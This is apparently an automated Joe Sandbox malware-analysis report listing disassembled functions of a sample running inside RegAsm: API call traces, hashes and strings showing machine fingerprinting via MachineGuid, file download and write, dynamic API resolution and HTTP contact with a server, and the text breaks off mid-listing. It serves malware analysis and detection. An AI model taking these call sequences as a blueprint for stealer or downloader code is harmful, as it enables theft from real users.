InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E24
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E45
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404E6C
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404E90
CloseHandle.KERNEL32(?,?,00000400), ref: 00404EAA
InternetCloseHandle.WININET(00000000), ref: 00404EB1
InternetCloseHandle.WININET(?), ref: 00404EBA

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2737972104-0
Opcode ID: a25d67a3a2f3fdfeaba9d8df5627200e159ff2d5a2b49d18510ea29a32385fb9
Instruction ID: 9992f2a2cb445bd017637bb275931e072b683fe6351a7a81dedcbf61475a23e3
Opcode Fuzzy Hash: a25d67a3a2f3fdfeaba9d8df5627200e159ff2d5a2b49d18510ea29a32385fb9
Instruction Fuzzy Hash: 8C4138B2900209ABDB10EFE1DD85EEE7B7DFF44704F10443AFA11B2191D7385A458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D2BA Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040D2BF
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D300
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D375
StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040D491

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 0040CA5F: _EH_prolog.MSVCRT ref: 0040CA64

Part of subcall function 0040A810: _EH_prolog.MSVCRT ref: 0040A815

StrCmpCA.SHLWAPI(00000000), ref: 0040D547
StrCmpCA.SHLWAPI(00000000), ref: 0040D5BB

Strings

Stable\, xrefs: 0040D5FE
Stable\, xrefs: 0040D3B8

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy
String ID: Stable\$ Stable\
API String ID: 2120869262-4033978473
Opcode ID: 0d37dc93a3ab44cf1acd9cd16f14fc52873d997c91e71b002d2caaf26f4d2e09
Instruction ID: 528cf13577b2f7f329050b7ccef95fe7cac87747c3dc2e9dd2ec3b92d3dc2083
Opcode Fuzzy Hash: 0d37dc93a3ab44cf1acd9cd16f14fc52873d997c91e71b002d2caaf26f4d2e09
Instruction Fuzzy Hash: EFD15271D00248AACF10EBBAD9467DDBFB4AF19304F50846EF84577282DB785718CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEF9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EF1F
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,NDB,?,?,00000000), ref: 0040EF3B
RegQueryValueExA.KERNEL32(NDB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0040EF5A
CharToOemA.USER32(?,?), ref: 0040EF77

Strings

NDB, xrefs: 0040EF27, 0040EF60, 0040EF57, 0040EF2A
SOFTWARE\Microsoft\Cryptography, xrefs: 0040EF31
MachineGuid, xrefs: 0040EF52

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValuememset
String ID: MachineGuid$NDB$SOFTWARE\Microsoft\Cryptography
API String ID: 1728412123-443910793
Opcode ID: 13e4882eb1125f27dd797c198b71fdf7c31a4107cfe51514bc4cf764ddd0f3a6
Instruction ID: c7b45006bd05bcce8b765a7edbe6677ca4963fc08e8d1b136df89886e47375eb
Opcode Fuzzy Hash: 13e4882eb1125f27dd797c198b71fdf7c31a4107cfe51514bc4cf764ddd0f3a6
Instruction Fuzzy Hash: 6E012C7594021DFFDB10DBA0EC89EEAB77CEB14748F1000A1B145A2052EBB49E998B60

Uniqueness

Uniqueness Score: -1.00%

Function 00406138 Relevance: 10.6, APIs: 7, Instructions: 70filememoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040613D
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061C3
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
String ID:
API String ID: 3869837436-0
Opcode ID: 14799fd20c6eaaff4fd43e91c765d24a78c4929a0e36d0399129c3326377c819
Instruction ID: 4eef68157ad315862bfd7591b0fce14e4dd7968f7242f7c704032396ebb2caca
Opcode Fuzzy Hash: 14799fd20c6eaaff4fd43e91c765d24a78c4929a0e36d0399129c3326377c819
Instruction Fuzzy Hash: 26219F31A00104AFDB209FA5DC89AAF7BB9FF44760F10092AF912F62D1D7349955CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA07 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000,?,Windows: ,00000000,?,0042451C,00000000,?,Work Dir: In memory,00000000,?,00424504), ref: 0040EA15
HeapAlloc.KERNEL32(00000000), ref: 0040EA1C
GlobalMemoryStatusEx.KERNEL32 ref: 0040EA3C
wsprintfA.USER32 ref: 0040EA62

Strings

@, xrefs: 0040EA35
%d MB, xrefs: 0040EA5C

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: 0d6f02759f3faad2c4d5b1dc494c944bc3e773da87faed9fee065f8d8b5c4296
Instruction ID: 34444111109be8d414b5ba55085423e125bbd5c149e3b0f9e886c25067a5b7a5
Opcode Fuzzy Hash: 0d6f02759f3faad2c4d5b1dc494c944bc3e773da87faed9fee065f8d8b5c4296
Instruction Fuzzy Hash: 3CF05BB1700204ABE7149BB5DC4AF7E76BDE744705F400529F606E72C0D774DC158769

Uniqueness

Uniqueness Score: -1.00%

Function 004152AA Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 609networksleepCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004152AF

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 00411F49: _EH_prolog.MSVCRT ref: 00411F4E

Part of subcall function 00411FF8: _EH_prolog.MSVCRT ref: 00411FFD

Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B

Part of subcall function 0041608F: GetProcAddress.KERNEL32(74DD0000,004153D3), ref: 004160A3
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160BA
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160D1
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160E8
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004160FF
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416116
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041612D
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416144
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041615B
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416172
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416189
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161A0
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161B7
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161CE
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161E5
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004161FC
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416213
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041622A
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416241
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416258
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041626F
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 00416286
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 0041629D
Part of subcall function 0041608F: GetProcAddress.KERNEL32 ref: 004162B4

Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412358: _EH_prolog.MSVCRT ref: 0041235D

Part of subcall function 00411CE1: _EH_prolog.MSVCRT ref: 00411CE6

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004154DB
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004154F7

Part of subcall function 0040EFC1: _EH_prolog.MSVCRT ref: 0040EFC6
Part of subcall function 0040EFC1: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,00000000), ref: 0040EFE9
Part of subcall function 0040EFC1: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0040F01B
Part of subcall function 0040EFC1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0040F05E
Part of subcall function 0040EFC1: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 0040F065

Part of subcall function 00403AA8: _EH_prolog.MSVCRT ref: 00403AAD
Part of subcall function 00403AA8: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403B58
Part of subcall function 00403AA8: StrCmpCA.SHLWAPI(?), ref: 00403B6F

Part of subcall function 0041068E: _EH_prolog.MSVCRT ref: 00410693
Part of subcall function 0041068E: StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00415572), ref: 004106B5
Part of subcall function 0041068E: ExitProcess.KERNEL32 ref: 004106C0

Part of subcall function 00405114: _EH_prolog.MSVCRT ref: 00405119
Part of subcall function 00405114: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051C4
Part of subcall function 00405114: StrCmpCA.SHLWAPI(?), ref: 004051DB

Part of subcall function 0041017A: _EH_prolog.MSVCRT ref: 0041017F
Part of subcall function 0041017A: strtok_s.MSVCRT ref: 004101A6
Part of subcall function 0041017A: StrCmpCA.SHLWAPI(00000000,00424468,?,?,?,?,00415701), ref: 004101D7
Part of subcall function 0041017A: strtok_s.MSVCRT ref: 00410238

Part of subcall function 00401E78: _EH_prolog.MSVCRT ref: 00401E7D

Part of subcall function 00405114: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405363
Part of subcall function 00405114: HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 0040539A

Part of subcall function 004116B1: _EH_prolog.MSVCRT ref: 004116B6
Part of subcall function 004116B1: strtok_s.MSVCRT ref: 004116DD

Sleep.KERNEL32(000003E8), ref: 004158B0

Part of subcall function 00405114: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053BF

Part of subcall function 004116B1: strtok_s.MSVCRT ref: 0041171D

Strings

5 Ar A, xrefs: 004153E1

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$H_prolog$Internetlstrcpy$Open$strtok_s$HeapProcesslstrcatlstrlen$AllocConnectDirectoryExitHttpInformationOptionRequestSleepSystemTimeVolumeWindows
String ID: 5 Ar A
API String ID: 3168723216-3291926139
Opcode ID: 86f87955fcc1c16ebec1c5af04fe795e2ce60e0376ce5a452a8983ef4ce18e12
Instruction ID: 3374eb596b5d5a0286ed6da2344d269bd5d9a88185801f0b009e9d551ef1266a
Opcode Fuzzy Hash: 86f87955fcc1c16ebec1c5af04fe795e2ce60e0376ce5a452a8983ef4ce18e12
Instruction Fuzzy Hash: 7C326F71D00258EADF10EBA5CD46BDDBBB8AF19304F5444AEF50473281DB781B588BA7

Uniqueness

Uniqueness Score: -1.00%

Function 0041479F Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004147A4
memset.MSVCRT ref: 004147D0
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 004147ED
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041480D
lstrcat.KERNEL32(?,?), ref: 0041483C
lstrcat.KERNEL32(?), ref: 0041484F

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologOpenQueryValuememset
String ID:
API String ID: 2333602472-0
Opcode ID: 23d6611d757252a73f0ad013c00bb11107bded11804397f685dc765b24b49186
Instruction ID: c3499e38f8189600d531ca9067773349a2dd13f3b93546227b976a07357d8d78
Opcode Fuzzy Hash: 23d6611d757252a73f0ad013c00bb11107bded11804397f685dc765b24b49186
Instruction Fuzzy Hash: 554180B1C4010DABCF10EFA5DC479DE7BBDEB04344F00446AF604A2190E7399B998F95

Uniqueness

Uniqueness Score: -1.00%

Function 00403A07 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00403A0C
??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
??_U@YAPAXI@Z.MSVCRT ref: 00403A47
??_U@YAPAXI@Z.MSVCRT ref: 00403A50
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackH_prologInternetlstrlen
String ID:
API String ID: 503950642-0
Opcode ID: 91fa16dd040635a00a2e9b63fea9752a583429d9250c32b45f5a4aec89c222b7
Instruction ID: 2f8a022458d13e61e496b472b41c0555fc9e22f0f2bbbfe777871443f4a07e58
Opcode Fuzzy Hash: 91fa16dd040635a00a2e9b63fea9752a583429d9250c32b45f5a4aec89c222b7
Instruction Fuzzy Hash: EB111C71D01218AACB14EFA5D845ADE7F78AF05324F20462AE425E72D0DB789B45CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00406492 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406497

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00423B74,?,?,?,00423B6F,00000000), ref: 00406554

Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B

SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00423B78,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00423B73), ref: 004065CC
LoadLibraryA.KERNEL32(00000000), ref: 004065E7

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00406548, 0040654D, 00406567

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 757424748-3463377506
Opcode ID: 4839454172695e66329f3c4df5c3fa71ca6b00c885d6233381056ebeb16fa1c7
Instruction ID: 43ce55d3e1cd6bde044dc6bd4eb531da728d52fb991cb47f02cf4b9312dcc2f3
Opcode Fuzzy Hash: 4839454172695e66329f3c4df5c3fa71ca6b00c885d6233381056ebeb16fa1c7
Instruction Fuzzy Hash: 0861C030800544EECB25EFA1DC11AADBF75AF18314F14546EB402332E2DB381A25DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B8F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B8FA

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE

Part of subcall function 0040F7EF: LocalAlloc.KERNEL32(00000040,00411C18,00000001,00000000,?,00411C17,00000000,00000000), ref: 0040F808

StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D

Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 0040620F
Part of subcall function 004061EF: LocalAlloc.KERNEL32(00000040,004058D6,?,?,004058D6,00000000,?,?), ref: 0040621D
Part of subcall function 004061EF: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 00406233
